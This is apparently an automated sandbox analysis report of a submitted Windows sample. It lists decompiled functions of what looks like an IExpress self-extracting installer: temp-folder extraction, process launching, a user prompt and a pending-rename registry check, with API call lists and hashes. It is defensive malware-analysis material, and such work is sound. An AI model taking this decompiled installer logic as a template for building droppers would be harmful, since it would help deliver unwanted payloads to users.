                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00384096,00384096,?,00381ED3,00000001,00000000,?,?,00384137,?), ref: 003825B2
                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00384096,?,00381ED3,00000001,00000000,?,?,00384137,?,00384096), ref: 003825CB
                                                • RegCloseKey.KERNELBASE(?,?,00381ED3,00000001,00000000,?,?,00384137,?,00384096), ref: 003825DD
                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00384096,00384096,?,00381ED3,00000001,00000000,?,?,00384137,?), ref: 003825FF
                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00384096,00000000,00000000,00000000,00000000,?,00381ED3,00000001,00000000), ref: 0038261A
                                                Strings
                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 003825A8
                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003825F5
                                                • PendingFileRenameOperations, xrefs: 003825C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: OpenQuery$CloseInfoValue
                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                • API String ID: 2209512893-559176071
                                                • Opcode ID: ba08c29d2dfcebda5ea744be897279bfc42a4122ced4a744d69f6c64c601edaf
                                                • Instruction ID: 22fcd7c85390a52eaecf9787f217000dec564b9c9fe60d2267c6525aea90b1a5
                                                • Opcode Fuzzy Hash: ba08c29d2dfcebda5ea744be897279bfc42a4122ced4a744d69f6c64c601edaf
                                                • Instruction Fuzzy Hash: 12114675942328FBAF22ABA19C09DFBBF7CDF457A1F5040D5F808A2011D6745E44E7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 577 386a60-386a91 call 387155 call 387208 GetStartupInfoW 583 386a93-386aa2 577->583 584 386abc-386abe 583->584 585 386aa4-386aa6 583->585 588 386abf-386ac5 584->588 586 386aa8-386aad 585->586 587 386aaf-386aba Sleep 585->587 586->588 587->583 589 386ad1-386ad7 588->589 590 386ac7-386acf _amsg_exit 588->590 592 386ad9-386ae9 call 386c3f 589->592 593 386b05 589->593 591 386b0b-386b11 590->591 595 386b2e-386b30 591->595 596 386b13-386b24 _initterm 591->596 599 386aee-386af2 592->599 593->591 597 386b3b-386b42 595->597 598 386b32-386b39 595->598 596->595 600 386b44-386b51 call 387060 597->600 601 386b67-386b71 597->601 598->597 599->591 602 386af4-386b00 599->602 600->601 611 386b53-386b65 600->611 604 386b74-386b79 601->604 605 386c39-386c3e call 38724d 602->605 608 386b7b-386b7d 604->608 609 386bc5-386bc8 604->609 614 386b7f-386b81 608->614 615 386b94-386b98 608->615 612 386bca-386bd3 609->612 613 386bd6-386be3 _ismbblead 609->613 611->601 612->613 618 386be9-386bed 613->618 619 386be5-386be6 613->619 614->609 620 386b83-386b85 614->620 616 386b9a-386b9e 615->616 617 386ba0-386ba2 615->617 621 386ba3-386bbc call 382bfb 616->621 617->621 618->604 623 386c1e-386c25 618->623 619->618 620->615 624 386b87-386b8a 620->624 621->623 630 386bbe-386bbf exit 621->630 626 386c32 623->626 627 386c27-386c2d _cexit 623->627 624->615 628 386b8c-386b92 624->628 626->605 627->626 628->620 630->609
                                                C-Code - Quality: 51%
                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int* _t25;
                                                				signed int _t26;
                                                				signed int _t29;
                                                				int _t30;
                                                				signed int _t37;
                                                				signed char _t41;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				intOrPtr _t56;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				intOrPtr* _t60;
                                                				void* _t62;
                                                				void* _t67;
                                                				void* _t68;
                                                
                                                				E00387155();
                                                				_push(0x58);
                                                				_push(0x3872b8);
                                                				E00387208(__ebx, __edi, __esi);
                                                				 *(_t62 - 0x20) = 0;
                                                				GetStartupInfoW(_t62 - 0x68);
                                                				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                				_t53 = 0;
                                                				while(1) {
                                                					asm("lock cmpxchg [edx], ecx");
                                                					if(0 == 0) {
                                                						break;
                                                					}
                                                					if(0 != _t56) {
                                                						Sleep(0x3e8);
                                                						continue;
                                                					} else {
                                                						_t58 = 1;
                                                						_t53 = 1;
                                                					}
                                                					L7:
                                                					_t67 =  *0x3888b0 - _t58; // 0x2
                                                					if(_t67 != 0) {
                                                						__eflags =  *0x3888b0; // 0x2
                                                						if(__eflags != 0) {
                                                							 *0x3881e4 = _t58;
                                                							goto L13;
                                                						} else {
                                                							 *0x3888b0 = _t58;
                                                							_t37 = E00386C3F(0x3810b8, 0x3810c4); // executed
                                                							__eflags = _t37;
                                                							if(__eflags == 0) {
                                                								goto L13;
                                                							} else {
                                                								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                								_t30 = 0xff;
                                                							}
                                                						}
                                                					} else {
                                                						_push(0x1f);
                                                						L00386FF4();
                                                						L13:
                                                						_t68 =  *0x3888b0 - _t58; // 0x2
                                                						if(_t68 == 0) {
                                                							_push(0x3810b4);
                                                							_push(0x3810ac);
                                                							L00387202();
                                                							 *0x3888b0 = 2;
                                                						}
                                                						if(_t53 == 0) {
                                                							 *0x3888ac = 0;
                                                						}
                                                						_t71 =  *0x3888b4;
                                                						if( *0x3888b4 != 0 && E00387060(_t71, 0x3888b4) != 0) {
                                                							_t60 =  *0x3888b4; // 0x0
                                                							 *0x38a288(0, 2, 0);
                                                							 *_t60();
                                                						}
                                                						_t25 = __imp___acmdln; // 0x76665b9c
                                                						_t59 =  *_t25;
                                                						 *(_t62 - 0x1c) = _t59;
                                                						_t54 =  *(_t62 - 0x20);
                                                						while(1) {
                                                							_t41 =  *_t59;
                                                							if(_t41 > 0x20) {
                                                								goto L32;
                                                							}
                                                							if(_t41 != 0) {
                                                								if(_t54 != 0) {
                                                									goto L32;
                                                								} else {
                                                									while(_t41 != 0 && _t41 <= 0x20) {
                                                										_t59 = _t59 + 1;
                                                										 *(_t62 - 0x1c) = _t59;
                                                										_t41 =  *_t59;
                                                									}
                                                								}
                                                							}
                                                							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                								_t29 = 0xa;
                                                							} else {
                                                								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                							}
                                                							_push(_t29);
                                                							_t30 = E00382BFB(0x380000, 0, _t59); // executed
                                                							 *0x3881e0 = _t30;
                                                							__eflags =  *0x3881f8;
                                                							if( *0x3881f8 == 0) {
                                                								exit(_t30); // executed
                                                								goto L32;
                                                							}
                                                							__eflags =  *0x3881e4;
                                                							if( *0x3881e4 == 0) {
                                                								__imp___cexit();
                                                								_t30 =  *0x3881e0; // 0x80070002
                                                							}
                                                							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                							goto L40;
                                                							L32:
                                                							__eflags = _t41 - 0x22;
                                                							if(_t41 == 0x22) {
                                                								__eflags = _t54;
                                                								_t15 = _t54 == 0;
                                                								__eflags = _t15;
                                                								_t54 = 0 | _t15;
                                                								 *(_t62 - 0x20) = _t54;
                                                							}
                                                							_t26 = _t41 & 0x000000ff;
                                                							__imp___ismbblead(_t26);
                                                							__eflags = _t26;
                                                							if(_t26 != 0) {
                                                								_t59 = _t59 + 1;
                                                								__eflags = _t59;
                                                								 *(_t62 - 0x1c) = _t59;
                                                							}
                                                							_t59 = _t59 + 1;
                                                							 *(_t62 - 0x1c) = _t59;
                                                						}
                                                					}
                                                					L40:
                                                					return E0038724D(_t30);
                                                				}
                                                				_t58 = 1;
                                                				__eflags = 1;
                                                				goto L7;
                                                			}


















                                                0x00386a60
                                                0x00386a6a
                                                0x00386a6c
                                                0x00386a71
                                                0x00386a78
                                                0x00386a7f
                                                0x00386a85
                                                0x00386a8e
                                                0x00386a91
                                                0x00386a93
                                                0x00386a9c
                                                0x00386aa2
                                                0x00000000
                                                0x00000000
                                                0x00386aa6
                                                0x00386ab4
                                                0x00000000
                                                0x00386aa8
                                                0x00386aaa
                                                0x00386aab
                                                0x00386aab
                                                0x00386abf
                                                0x00386abf
                                                0x00386ac5
                                                0x00386ad1
                                                0x00386ad7
                                                0x00386b05
                                                0x00000000
                                                0x00386ad9
                                                0x00386ad9
                                                0x00386ae9
                                                0x00386af0
                                                0x00386af2
                                                0x00000000
                                                0x00386af4
                                                0x00386af4
                                                0x00386afb
                                                0x00386afb
                                                0x00386af2
                                                0x00386ac7
                                                0x00386ac7
                                                0x00386ac9
                                                0x00386b0b
                                                0x00386b0b
                                                0x00386b11
                                                0x00386b13
                                                0x00386b18
                                                0x00386b1d
                                                0x00386b24
                                                0x00386b24
                                                0x00386b30
                                                0x00386b39
                                                0x00386b39
                                                0x00386b3b
                                                0x00386b42
                                                0x00386b57
                                                0x00386b5f
                                                0x00386b65
                                                0x00386b65
                                                0x00386b67
                                                0x00386b6c
                                                0x00386b6e
                                                0x00386b71
                                                0x00386b74
                                                0x00386b74
                                                0x00386b79
                                                0x00000000
                                                0x00000000
                                                0x00386b7d
                                                0x00386b81
                                                0x00000000
                                                0x00000000
                                                0x00386b83
                                                0x00386b8c
                                                0x00386b8d
                                                0x00386b90
                                                0x00386b90
                                                0x00386b83
                                                0x00386b81
                                                0x00386b94
                                                0x00386b98
                                                0x00386ba2
                                                0x00386b9a
                                                0x00386b9a
                                                0x00386b9a
                                                0x00386ba3
                                                0x00386bab
                                                0x00386bb0
                                                0x00386bb5
                                                0x00386bbc
                                                0x00386bbf
                                                0x00000000
                                                0x00386bbf
                                                0x00386c1e
                                                0x00386c25
                                                0x00386c27
                                                0x00386c2d
                                                0x00386c2d
                                                0x00386c32
                                                0x00000000
                                                0x00386bc5
                                                0x00386bc5
                                                0x00386bc8
                                                0x00386bcc
                                                0x00386bce
                                                0x00386bce
                                                0x00386bd1
                                                0x00386bd3
                                                0x00386bd3
                                                0x00386bd6
                                                0x00386bda
                                                0x00386be1
                                                0x00386be3
                                                0x00386be5
                                                0x00386be5
                                                0x00386be6
                                                0x00386be6
                                                0x00386be9
                                                0x00386bea
                                                0x00386bea
                                                0x00386b74
                                                0x00386c39
                                                0x00386c3e
                                                0x00386c3e
                                                0x00386abe
                                                0x00386abe
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00387155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00387182
                                                  • Part of subcall function 00387155: GetCurrentProcessId.KERNEL32 ref: 00387191
                                                  • Part of subcall function 00387155: GetCurrentThreadId.KERNEL32 ref: 0038719A
                                                  • Part of subcall function 00387155: GetTickCount.KERNEL32 ref: 003871A3
                                                  • Part of subcall function 00387155: QueryPerformanceCounter.KERNEL32(?), ref: 003871B8
                                                • GetStartupInfoW.KERNEL32(?,003872B8,00000058), ref: 00386A7F
                                                • Sleep.KERNEL32(000003E8), ref: 00386AB4
                                                • _amsg_exit.MSVCRT ref: 00386AC9
                                                • _initterm.MSVCRT ref: 00386B1D
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00386B49
                                                • exit.KERNELBASE ref: 00386BBF
                                                • _ismbblead.MSVCRT ref: 00386BDA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                • String ID:
                                                • API String ID: 836923961-0
                                                • Opcode ID: cb71f207ca33e1750a83bf0f9865786e5947b84f235eb306e469e5bc1f6cb44e
                                                • Instruction ID: 3afd9a5e2e0c00ef6e350c35e3df857be23ea65e5d8b570cfea6977d5b916ee3
                                                • Opcode Fuzzy Hash: cb71f207ca33e1750a83bf0f9865786e5947b84f235eb306e469e5bc1f6cb44e
                                                • Instruction Fuzzy Hash: BA41F570944724CFDB23BB69DC4A7AA77E9EB84724F6500DAE851E7290CF7488418B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 631 3858c8-3858d5 632 3858d8-3858dd 631->632 632->632 633 3858df-3858f1 LocalAlloc 632->633 634 385919-385959 call 381680 call 38658a CreateFileA LocalFree 633->634 635 3858f3-385901 call 3844b9 633->635 638 385906-385910 call 386285 634->638 645 38595b-38596c CloseHandle GetFileAttributesA 634->645 635->638 644 385912-385918 638->644 645->638 646 38596e-385970 645->646 646->638 647 385972-38597b 646->647 647->644
                                                C-Code - Quality: 95%
                                                			E003858C8(intOrPtr* __ecx) {
                                                				void* _v8;
                                                				intOrPtr _t6;
                                                				void* _t10;
                                                				void* _t12;
                                                				void* _t14;
                                                				signed char _t16;
                                                				void* _t20;
                                                				void* _t23;
                                                				intOrPtr* _t27;
                                                				CHAR* _t33;
                                                
                                                				_push(__ecx);
                                                				_t33 = __ecx;
                                                				_t27 = __ecx;
                                                				_t23 = __ecx + 1;
                                                				do {
                                                					_t6 =  *_t27;
                                                					_t27 = _t27 + 1;
                                                				} while (_t6 != 0);
                                                				_t36 = _t27 - _t23 + 0x14;
                                                				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                				if(_t20 != 0) {
                                                					E00381680(_t20, _t36, _t33);
                                                					E0038658A(_t20, _t36, "TMP4351$.TMP");
                                                					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                					_v8 = _t10;
                                                					LocalFree(_t20);
                                                					_t12 = _v8;
                                                					if(_t12 == 0xffffffff) {
                                                						goto L4;
                                                					} else {
                                                						CloseHandle(_t12);
                                                						_t16 = GetFileAttributesA(_t33); // executed
                                                						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                							goto L4;
                                                						} else {
                                                							 *0x389124 = 0;
                                                							_t14 = 1;
                                                						}
                                                					}
                                                				} else {
                                                					E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                					L4:
                                                					 *0x389124 = E00386285();
                                                					_t14 = 0;
                                                				}
                                                				return _t14;
                                                			}













                                                0x003858cd
                                                0x003858d1
                                                0x003858d3
                                                0x003858d5
                                                0x003858d8
                                                0x003858d8
                                                0x003858da
                                                0x003858db
                                                0x003858e1
                                                0x003858ed
                                                0x003858f1
                                                0x0038591e
                                                0x0038592c
                                                0x00385943
                                                0x0038594a
                                                0x0038594d
                                                0x00385953
                                                0x00385959
                                                0x00000000
                                                0x0038595b
                                                0x0038595c
                                                0x00385963
                                                0x0038596c
                                                0x00000000
                                                0x00385972
                                                0x00385974
                                                0x0038597a
                                                0x0038597a
                                                0x0038596c
                                                0x003858f3
                                                0x00385901
                                                0x00385906
                                                0x0038590b
                                                0x00385910
                                                0x00385910
                                                0x00385918

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003858E7
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385943
                                                • LocalFree.KERNEL32(00000000,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038594D
                                                • CloseHandle.KERNEL32(00000000,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038595C
                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385963
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                • API String ID: 747627703-3104274291
                                                • Opcode ID: 1dff987b3135c7953c05639a7ff719da03f85e984044b20bbd92ef760e831012
                                                • Instruction ID: b469211e7e8a934bdba40fa8bbbe74725fcd4dbe247350787e65997b3baf3f0f
                                                • Opcode Fuzzy Hash: 1dff987b3135c7953c05639a7ff719da03f85e984044b20bbd92ef760e831012
                                                • Instruction Fuzzy Hash: FE113472600710ABD7227FBAAC4DBAB7E9DDF46360F1006D6F50AD72C1DB74980683A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 675 383fef-384010 676 38410a-38411a call 386ce0 675->676 677 384016-38403b CreateProcessA 675->677 678 384041-38406e WaitForSingleObject GetExitCodeProcess 677->678 679 3840c4-384101 call 386285 GetLastError FormatMessageA call 3844b9 677->679 682 384070-384077 678->682 683 384091 call 38411b 678->683 693 384106 679->693 682->683 687 384079-38407b 682->687 688 384096-3840b8 CloseHandle * 2 683->688 687->683 690 38407d-384089 687->690 691 384108 688->691 692 3840ba-3840c0 688->692 690->683 694 38408b 690->694 691->676 692->691 695 3840c2 692->695 693->691 694->683 695->693
                                                C-Code - Quality: 84%
                                                			E00383FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                				signed int _v8;
                                                				char _v524;
                                                				long _v528;
                                                				struct _PROCESS_INFORMATION _v544;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t20;
                                                				void* _t22;
                                                				int _t25;
                                                				intOrPtr* _t39;
                                                				signed int _t44;
                                                				void* _t49;
                                                				signed int _t50;
                                                				intOrPtr _t53;
                                                
                                                				_t45 = __edx;
                                                				_t20 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t20 ^ _t50;
                                                				_t39 = __ecx;
                                                				_t49 = 1;
                                                				_t22 = 0;
                                                				if(__ecx == 0) {
                                                					L13:
                                                					return E00386CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                				}
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                				if(_t25 == 0) {
                                                					 *0x389124 = E00386285();
                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                					_t45 = 0x4c4;
                                                					E003844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                					L11:
                                                					_t49 = 0;
                                                					L12:
                                                					_t22 = _t49;
                                                					goto L13;
                                                				}
                                                				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                				_t44 = _v528;
                                                				_t53 =  *0x388a28; // 0x0
                                                				if(_t53 == 0) {
                                                					_t34 =  *0x389a2c; // 0x0
                                                					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                						_t34 = _t44 & 0xff000000;
                                                						if((_t44 & 0xff000000) == 0xaa000000) {
                                                							 *0x389a2c = _t44;
                                                						}
                                                					}
                                                				}
                                                				E0038411B(_t34, _t44);
                                                				CloseHandle(_v544.hThread);
                                                				CloseHandle(_v544);
                                                				if(( *0x389a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                					goto L12;
                                                				} else {
                                                					goto L11;
                                                				}
                                                			}


















                                                0x00383fef
                                                0x00383ffa
                                                0x00384001
                                                0x00384008
                                                0x0038400a
                                                0x0038400b
                                                0x00384010
                                                0x0038410a
                                                0x0038411a
                                                0x0038411a
                                                0x0038401c
                                                0x0038401d
                                                0x0038401e
                                                0x0038401f
                                                0x00384033
                                                0x0038403b
                                                0x003840ca
                                                0x003840e9
                                                0x003840f8
                                                0x00384101
                                                0x00384106
                                                0x00384106
                                                0x00384108
                                                0x00384108
                                                0x00000000
                                                0x00384108
                                                0x00384049
                                                0x0038405c
                                                0x00384062
                                                0x00384068
                                                0x0038406e
                                                0x00384070
                                                0x00384077
                                                0x0038407f
                                                0x00384089
                                                0x0038408b
                                                0x0038408b
                                                0x00384089
                                                0x00384077
                                                0x00384091
                                                0x0038409c
                                                0x003840a8
                                                0x003840b8
                                                0x00000000
                                                0x003840c2
                                                0x00000000
                                                0x003840c2

                                                APIs
                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00384033
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00384049
                                                • GetExitCodeProcess.KERNELBASE ref: 0038405C
                                                • CloseHandle.KERNEL32(?), ref: 0038409C
                                                • CloseHandle.KERNEL32(?), ref: 003840A8
                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003840DC
                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003840E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                • String ID:
                                                • API String ID: 3183975587-0
                                                • Opcode ID: 96120f706920379706d98bbebc89bf28bcc62475f97a16d24b405bb6faeffe0e
                                                • Instruction ID: def5a431923aeb19744a5f593a8acf49b993d60e22349a8947b5c6028ebc6725
                                                • Opcode Fuzzy Hash: 96120f706920379706d98bbebc89bf28bcc62475f97a16d24b405bb6faeffe0e
                                                • Instruction Fuzzy Hash: AA31BF71640718ABEB22AF65DC4DFBBB77CEB94701F1001EAFA05D65A1CA348D85CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E003851E5(void* __eflags) {
                                                				int _t5;
                                                				void* _t6;
                                                				void* _t28;
                                                
                                                				_t1 = E0038468F("UPROMPT", 0, 0) + 1; // 0x1
                                                				_t28 = LocalAlloc(0x40, _t1);
                                                				if(_t28 != 0) {
                                                					if(E0038468F("UPROMPT", _t28, _t29) != 0) {
                                                						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                						if(_t5 != 0) {
                                                							_t6 = E003844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                							LocalFree(_t28);
                                                							if(_t6 != 6) {
                                                								 *0x389124 = 0x800704c7;
                                                								L10:
                                                								return 0;
                                                							}
                                                							 *0x389124 = 0;
                                                							L6:
                                                							return 1;
                                                						}
                                                						LocalFree(_t28);
                                                						goto L6;
                                                					}
                                                					E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                					LocalFree(_t28);
                                                					 *0x389124 = 0x80070714;
                                                					goto L10;
                                                				}
                                                				E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                				 *0x389124 = E00386285();
                                                				goto L10;
                                                			}






                                                0x003851fb
                                                0x00385207
                                                0x0038520b
                                                0x0038523c
                                                0x00385268
                                                0x00385270
                                                0x0038528b
                                                0x00385293
                                                0x0038529c
                                                0x003852a6
                                                0x003852b0
                                                0x00000000
                                                0x003852b0
                                                0x0038529e
                                                0x00385279
                                                0x00000000
                                                0x0038527b
                                                0x00385273
                                                0x00000000
                                                0x00385273
                                                0x0038524a
                                                0x00385250
                                                0x00385256
                                                0x00000000
                                                0x00385256
                                                0x00385219
                                                0x00385223
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
                                                  • Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
                                                  • Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
                                                  • Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
                                                  • Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
                                                  • Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00382F4D,?,00000002,00000000), ref: 00385201
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00385250
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                  • Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                • String ID: <None>$UPROMPT
                                                • API String ID: 957408736-2980973527
                                                • Opcode ID: dfae66423f91943f13a2169d2b9a7b1e0ea3ba01dbfcbf5cbfbbd10614503b36
                                                • Instruction ID: 56085e16eb01b9b1d68a86445535bee9d751ef5e9824617d504950e14bb77666
                                                • Opcode Fuzzy Hash: dfae66423f91943f13a2169d2b9a7b1e0ea3ba01dbfcbf5cbfbbd10614503b36
                                                • Instruction Fuzzy Hash: AA1104B5200702ABE3177BB15C89F3B719EEB88390F1048EAF602DA590DEB99C014325
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E003852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				signed int _t9;
                                                				signed int _t11;
                                                				void* _t21;
                                                				void* _t29;
                                                				CHAR** _t31;
                                                				void* _t32;
                                                				signed int _t33;
                                                
                                                				_t28 = __edi;
                                                				_t22 = __ecx;
